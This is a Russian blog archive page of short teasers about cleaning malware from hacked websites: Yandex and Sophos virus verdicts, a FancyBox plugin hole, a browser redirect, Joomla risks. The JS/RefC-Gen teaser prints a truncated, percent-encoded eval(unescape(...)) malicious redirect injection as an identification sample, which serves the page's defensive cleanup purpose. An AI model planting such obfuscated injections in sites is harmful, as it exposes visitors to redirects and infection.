Посты про “вирус”

удаление вируса Troj/JSRedir-RC


Новая пометка проявляется на сайтах — Troj/JSRedir-RC.
(далее…) «удаление вируса Troj/JSRedir-RC»» class=»more-link»>далее «удаление вируса Troj/JSRedir-RC»

удаление вируса JS/RefC-Gen


Данная пометка говорит о том, что где либо на сайте вставлен вредоносный яваскрипт.
По данным указанным на странице вердиктов Яндекса JSRefC-Gen выглядит так:

eval(unescape('\%76\%61\%72\%20\%72\%20\%3D\%20\%64\%6F\%63\%75\%6D\%65\%6E\%74\%2E\%72\%65\%66\%65\%72\%72\%65\%72\%3B\%69\%66\%20\%28\%72\%2E\%69\%6E
.......
\%64\%69\%76\%20\%73\%74\%79\%6C\%65\%3D\%27\%64\%69\%73\%70\%6C\%61\%79\%3A\%6E\%6F\%6E\%65\%27\%3E\%22\%29\%20\%7D'));

* — часть вредоносного кода удалена для безопасности.
(далее…) «удаление вируса JS/RefC-Gen»» class=»more-link»>далее «удаление вируса JS/RefC-Gen»

удаление вируса Troj/JSRedir-NN


Очередная модификация вердикта от Яндекса для зараженных сайтов. «Очередная», потому что заражение очень похоже на Troj/JSRedir-NZ.
(далее…) «удаление вируса Troj/JSRedir-NN»» class=»more-link»>далее «удаление вируса Troj/JSRedir-NN»

уязвимость FancyBox for WordPress (Troj/JSRedir-QG)


5 февраля на сайте компании SecuriLab была опубликована статья про уязвимость, найденную в плагине FancyBox for WordPress. Эта уязвимость позволяет обойти ограничения безопасности и разместить вредоносную вставку на использующем этот плагин сайте.
(далее…) «уязвимость FancyBox for WordPress (Troj/JSRedir-QG)»» class=»more-link»>далее «уязвимость FancyBox for WordPress (Troj/JSRedir-QG)»

удаление вируса Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A


Вашему сайту Яндекс поставил пометку:

Сайт *** может представлять угрозу
Что произошло
Яндекс обнаружил на этом сайте вредоносный программный код, который может заразить ваш компьютер вирусом или получить доступ к вашей личной информации.
Подробнее про вредоносный код

Яндекс периодически проверяет сайты, чтобы предупреждать пользователей об опасных страницах. Последняя проверка (менее двух дней назад) показала, что на сайте размещён вредоносный код. Это могло произойти как по желанию владельцев сайта, так и без их ведома — в результате действий злоумышленников.

Вредоносный код:
- обращается по адресам, которые находятся в чёрном списке Яндекса, как распространители вредоносного ПО;
- содержит exploit (по данным поведенческого анализатора Яндекса);
- содержит Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A (по данным компании Sophos).

вирус Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A
(далее…) «удаление вируса Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A»» class=»more-link»>далее «удаление вируса Andr/FakeIns-AE, Andr/SMStan-A, Andr/SmsThief-A»

удаление вируса Mal/HappJS-A


Довольно редко встречающаяся вставка в яваскрипты (.js).
В основном делают ее в файлы шаблонов, скачанные с сайтов «бесплатных шаблонов» чтобы заражать компьютеры и мобильные устройства посетителей сайта.
(далее…) «удаление вируса Mal/HappJS-A»» class=»more-link»>далее «удаление вируса Mal/HappJS-A»

удаление вируса Troj/LSRedir-OT


Довольно часто встречается данный вердикт на сайтах. Но в сети он более известен как rsize.js.
Подгружаемый скрипт добавляет тег iframe, который обычно размещается вне видимой области страницы.
(далее…) «удаление вируса Troj/LSRedir-OT»» class=»more-link»>далее «удаление вируса Troj/LSRedir-OT»

удаление вируса Troj/JSRedir-NZ


Иногда встречающийся вердикт яндекса у взломанных сайтов Troj/JSRedir-NZ.
Из названия понятно, что происходит попытка подгрузки вредоносного яваскрипта.
(далее…) «удаление вируса Troj/JSRedir-NZ»» class=»more-link»>далее «удаление вируса Troj/JSRedir-NZ»

traflab_ru при открытии любого браузера


Принесли мне ноутбук на осмотр/починку. Симптомы простые — при открытии любого браузера, сразу открывается страница сайта

traflab.ru

и последующий редирект либо на рекламный сайт, либо на сайт с вирусами.
(далее…) «traflab_ru при открытии любого браузера»» class=»more-link»>далее «traflab_ru при открытии любого браузера»

безопасность joomla и дырявые модули


Движок Joomla разрабатывается очень давно. На данный момент существует уже 6 линеек этого движка:

1. joomla 1.0...
2. joomla 1.5...
3. joomla 1.6...
4. joomla 1.7...
5. joomla 2.5...
6. joomla 3.....

Каждая линейка отличается друг от друга довольно сильными изменениями кода соответственно и переход на более высокую линейку довольно сложен. Хотя версии 1.6…, 1.7…, 2.5… и 3….. являются логическими продолжениями друг друга, в большинстве случаев переход вытекает в создание сайта на новой версии с нуля.
(далее…) «безопасность joomla и дырявые модули»» class=»more-link»>далее «безопасность joomla и дырявые модули»